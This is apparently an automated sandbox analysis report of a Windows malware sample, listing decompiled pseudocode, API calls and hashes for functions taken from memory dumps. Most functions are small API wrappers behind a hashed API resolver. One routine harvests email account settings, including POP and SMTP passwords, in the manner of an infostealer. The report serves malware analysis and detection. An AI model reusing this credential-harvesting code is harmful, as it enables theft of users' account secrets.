                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                      • Instruction ID: 291ca984118c00001a410e8fe814b9ebecee15bf7cc635df9db1cfcd8d33b31d
                      • Opcode Fuzzy Hash: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                      • Instruction Fuzzy Hash: 0EB092B004820C3EAE002EF19C05C3B3E8DEA4454870044757E0CE5051EA36DE1110A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                      0x00403bfc
                      0x00403c04
                      0x00403c07

                      APIs
                      • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: CloseFind
                      • String ID:
                      • API String ID: 1863332320-0
                      • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                      • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                      • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                      • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                      0x00403bc4
                      0x00403bcc
                      0x00403bcf

                      APIs
                      • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                      • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                      • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                      • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                      0x00404a0d
                      0x00404a15
                      0x00404a18

                      APIs
                      • RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                      • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                      0x00403b72
                      0x00403b7a
                      0x00403b7d

                      APIs
                      • PathFileExistsW.SHLWAPI(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: ExistsFilePath
                      • String ID:
                      • API String ID: 1174141254-0
                      • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                      • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                      • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                      • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                      Download Yara Rule
                      APIs
                      • closesocket.WS2_32(00404EB0), ref: 00404DEB
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: closesocket
                      • String ID:
                      • API String ID: 2781271927-0
                      • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                      • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                      • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                      • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004044EE, Relevance: 1.3, APIs: 1, Instructions: 77COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004044EE(void* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16) {
				intOrPtr _v8;
				void* _t25;
				void* _t28;
				long _t29;
				signed int _t36;
				void* _t45;
				signed int _t53;
				signed int _t55;
				signed int _t58;
				void* _t61;
				void* _t63;

				_t36 = 0x400;
				_t53 = 2;
				_t58 = 0x400;
				_t61 = E00402B7C( ~(0 | __eflags > 0x00000000) | 0x00000400 * _t53);
				if(_t61 == 0) {
					L4:
					_t25 = 0;
				} else {
					_v8 = 0x800;
					while(1) {
						E00402B4E(_t61, 0, _t58 + _t58);
						_t28 = E004044A7(_a8, _a12, _a16, _t61, _t58, _a4);
						_t13 = _t58 - 1; // 0x3ff
						_t63 = _t63 + 0x24;
						_t66 = _t28 - _t13;
						if(_t28 != _t13) {
							break;
						}
						_v8 = _v8 + 0x800;
						_t36 = _t36 + 0x400;
						E00402BAB(_t61);
						_t55 = 2;
						_t58 = _t36;
						_t61 = E00402B7C( ~(0 | _t66 > 0x00000000) | _t36 * _t55);
						if(_t61 != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L5;
					}
					_t29 = GetLastError();
					_t45 = 2;
					__eflags = _t29 - _t45;
					if(_t29 != _t45) {
						_t25 = _t61;
					} else {
						E00402BAB(_t61);
						goto L4;
					}
				}
				L5:
				return _t25;
			}














                      0x004044f5
                      0x004044fe
                      0x00404501
                      0x00404512
                      0x00404517
                      0x0040457c
                      0x0040457c
                      0x00404519
                      0x00404519
                      0x00404520
                      0x00404527
                      0x0040453a
                      0x0040453f
                      0x00404542
                      0x00404545
                      0x00404547
                      0x00000000
                      0x00000000
                      0x00404549
                      0x00404550
                      0x00404557
                      0x00404562
                      0x00404565
                      0x00404574
                      0x0040457a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040457a
                      0x00404585
                      0x0040458d
                      0x0040458e
                      0x00404590
                      0x0040459b
                      0x00404592
                      0x00404593
                      0x00000000
                      0x00404598
                      0x00404590
                      0x0040457e
                      0x00404584

                      APIs
                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                        • Part of subcall function 004044A7: GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                      • GetLastError.KERNEL32 ref: 00404585
                        • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                        • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateErrorFreeLastPrivateProfileString
                      • String ID:
                      • API String ID: 4065557613-0
                      • Opcode ID: b847ffe2297abf3b7cb70537e478af745f9013812161927550fe33201cdf7f27
                      • Instruction ID: 4921b4961515552709d35feb502e82dc384c9b3b90426e204c6f6ec5e0b55acd
                      • Opcode Fuzzy Hash: b847ffe2297abf3b7cb70537e478af745f9013812161927550fe33201cdf7f27
                      • Instruction Fuzzy Hash: 901157B26011043BEB249EA9AD46F7FB768DF84368F10413FFB05E61D0EA789C00069C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0092925D, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 009292AE
                      Memory Dump Source
                      • Source File: 00000004.00000002.664443157.0000000000928000.00000040.00000001.sdmp, Offset: 00928000, based on PE: false
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction ID: 9fdbf0e326d8b0f7cfb8396f4cbe764b7ef3dd702bf2953643f9a07bda38cf99
                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction Fuzzy Hash: 9D112B79A00208FFDB01DF98C985E98BBF5AF08350F058094F9489B362D371EA50DB80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                      0x00403fac
                      0x00403fba
                      0x00403fbe

                      APIs
                      • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: FreeVirtual
                      • String ID:
                      • API String ID: 1263568516-0
                      • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                      • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                      • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                      • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403C40, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = CloseHandle(_a4); // executed
				return _t4;
			}





                      0x00403c4d
                      0x00403c55
                      0x00403c58

                      APIs
                      • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: CloseHandle
                      • String ID:
                      • API String ID: 2962429428-0
                      • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                      • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                      • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                      • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                      0x0040647f
                      0x00406487
                      0x0040648a

                      APIs
                      • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                      • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                      • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                      • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                      Download Yara Rule
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 0040438F
                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                      • VariantInit.OLEAUT32(?), ref: 004043C4
                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                      • VariantInit.OLEAUT32(?), ref: 00404414
                      • SysAllocString.OLEAUT32(?), ref: 00404419
                      • VariantInit.OLEAUT32(?), ref: 00404431
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                      • String ID:
                      • API String ID: 1312198159-0
                      • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                      • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                      Download Yara Rule
                      C-Code - Quality: 88%
                      			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                      0x0040d070
                      0x0040d080
                      0x0040d084
                      0x0040d086
                      0x0040d08c
                      0x0040d0a0
                      0x0040d0ae
                      0x0040d0bd
                      0x0040d0c0
                      0x0040d0c5
                      0x0040d0c9
                      0x0040d0e3
                      0x0040d0f2
                      0x0040d101
                      0x0040d104
                      0x0040d109
                      0x0040d110
                      0x0040d11e
                      0x0040d123
                      0x0040d126
                      0x0040d12d
                      0x0040d145
                      0x0040d154
                      0x0040d15a
                      0x0040d166
                      0x0040d174
                      0x0040d186
                      0x0040d18e
                      0x0040d19a
                      0x0040d1ac
                      0x0040d1ba
                      0x0040d1cc
                      0x0040d1d1
                      0x0040d1dd
                      0x0040d1e2
                      0x0040d1e7
                      0x0040d1e7
                      0x0040d1e7
                      0x0040d1eb
                      0x0040d1f1
                      0x0040d1f7
                      0x0040d1ff
                      0x0040d207
                      0x0040d20f
                      0x0040d217
                      0x0040d21f
                      0x0040d227
                      0x0040d230

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                      • API String ID: 0-2111798378
                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0022092B, Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: .$GetProcAddress.$l
                      • API String ID: 0-2784972518
                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction ID: a1368690eb1bf0129f82696e878bee6ebb4af28ed6ea8f51c4a445d236bbdf64
                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction Fuzzy Hash: 9E319DB2910219DFDB10CF88D880AADBBF5FF08724F14404AD401A7312C3B0EA94CFA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 002256EC, Relevance: .1, Instructions: 146COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                      • Instruction ID: dfd8f1762b7e61849dd54909cfa01113c173175dffb6dfd8a47e01bd9a90d9a7
                      • Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                      • Instruction Fuzzy Hash: A64109B0A24B30AFE30C8F5AD495665BFD2EF81341B08C07DE8AACF655C6B0D515EB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040549C, Relevance: .1, Instructions: 146COMMONCrypto
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0040549C(signed int _a4, signed int* _a8) {
				signed int* _t46;
				void* _t47;
				signed int* _t48;
				signed int* _t49;
				signed int* _t50;
				signed int* _t51;
				signed int* _t52;
				signed int* _t53;
				signed int* _t55;
				signed int* _t57;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				unsigned int _t64;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t102;
				signed char* _t124;

				_t124 = _a4;
				_t59 =  *_t124 & 0x000000ff;
				if(_t59 >= 0) {
					_t57 = _a8;
					_t57[1] = _t57[1] & 0x00000000;
					 *_t57 = _t59;
					return 1;
				}
				_t95 = _t124[1] & 0x000000ff;
				if(_t95 >= 0) {
					_t55 = _a8;
					_t55[1] = _t55[1] & 0x00000000;
					 *_t55 = (_t59 & 0x0000007f) << 0x00000007 | _t95;
					return 2;
				}
				_t61 = _t59 << 0x0000000e | _t124[2] & 0x000000ff;
				if(_t61 < 0) {
					_t97 = _t95 << 0x0000000e | _t124[3] & 0x000000ff;
					_t62 = _t61 & 0x001fc07f;
					if(_t97 < 0) {
						_t98 = _t97 & 0x001fc07f;
						_t77 = _t62 << 0x0000000e | _t124[4] & 0x000000ff;
						if(_t77 < 0) {
							_t64 = _t62 << 0x00000007 | _t98;
							_t100 = _t98 << 0x0000000e | _t124[5] & 0x000000ff;
							if(_t100 < 0) {
								_t79 = _t77 << 0x0000000e | _t124[6] & 0x000000ff;
								if(_t79 < 0) {
									_t102 = _t100 << 0x0000000e | _t124[7] & 0x000000ff;
									_t81 = (_t79 & 0x001fc07f) << 7;
									if(_t102 < 0) {
										_t46 = _a8;
										 *_t46 = (_t102 & 0x001fc07f | _t81) << 0x00000008 | _t124[8] & 0x000000ff;
										_t46[1] = (_t124[4] & 0x000000ff) >> 0x00000003 & 0x0000000f | _t64 << 0x00000004;
										_t47 = 9;
									} else {
										_t48 = _a8;
										 *_t48 = _t102 & 0xf01fc07f | _t81;
										_t48[1] = _t64 >> 4;
										_t47 = 8;
									}
								} else {
									_t49 = _a8;
									 *_t49 = (_t100 << 0x00000007 ^ _t79) & 0x0fe03f80 ^ _t79;
									_t49[1] = _t64 >> 0xb;
									_t47 = 7;
								}
							} else {
								_t50 = _a8;
								_a4 = (_t77 & 0x001fc07f) << 0x00000007 | _t100;
								 *_t50 = _a4;
								_t50[1] = _t64 >> 0x12;
								_t47 = 6;
							}
						} else {
							_t51 = _a8;
							 *_t51 = _t98 << 0x00000007 | _t77;
							_t51[1] = _t62 >> 0x12;
							_t47 = 5;
						}
					} else {
						_t52 = _a8;
						_t52[1] = _t52[1] & 0x00000000;
						 *_t52 = _t97 & 0x001fc07f | _t62 << 0x00000007;
						_t47 = 4;
					}
					return _t47;
				} else {
					_t53 = _a8;
					_t53[1] = _t53[1] & 0x00000000;
					 *_t53 = (_t95 & 0x0000007f) << 0x00000007 | _t61 & 0x001fc07f;
					return 3;
				}
			}


























                      0x004054a1
                      0x004054a4
                      0x004054a9
                      0x004054ab
                      0x004054ae
                      0x004054b2
                      0x00000000
                      0x004054b4
                      0x004054bb
                      0x004054c1
                      0x004054c3
                      0x004054ce
                      0x004054d2
                      0x00000000
                      0x004054d4
                      0x004054e2
                      0x004054e6
                      0x00405513
                      0x00405515
                      0x00405519
                      0x0040553b
                      0x0040553d
                      0x00405541
                      0x00405565
                      0x0040556a
                      0x0040556e
                      0x0040559a
                      0x0040559e
                      0x004055c9
                      0x004055cb
                      0x004055d0
                      0x0040560d
                      0x00405610
                      0x00405612
                      0x00405615
                      0x004055d2
                      0x004055d2
                      0x004055e4
                      0x004055e6
                      0x004055e9
                      0x004055e9
                      0x004055a0
                      0x004055a0
                      0x004055b7
                      0x004055b9
                      0x004055bc
                      0x004055bc
                      0x00405570
                      0x00405570
                      0x0040557d
                      0x00405587
                      0x00405589
                      0x0040558c
                      0x0040558c
                      0x00405543
                      0x00405543
                      0x00405552
                      0x00405554
                      0x00405557
                      0x00405557
                      0x0040551b
                      0x0040551b
                      0x00405525
                      0x00405529
                      0x0040552b
                      0x0040552b
                      0x00000000
                      0x004054e8
                      0x004054e8
                      0x004054f9
                      0x004054fd
                      0x00000000
                      0x004054ff

                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                      • Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
                      • Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                      • Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00222C24, Relevance: .1, Instructions: 77COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
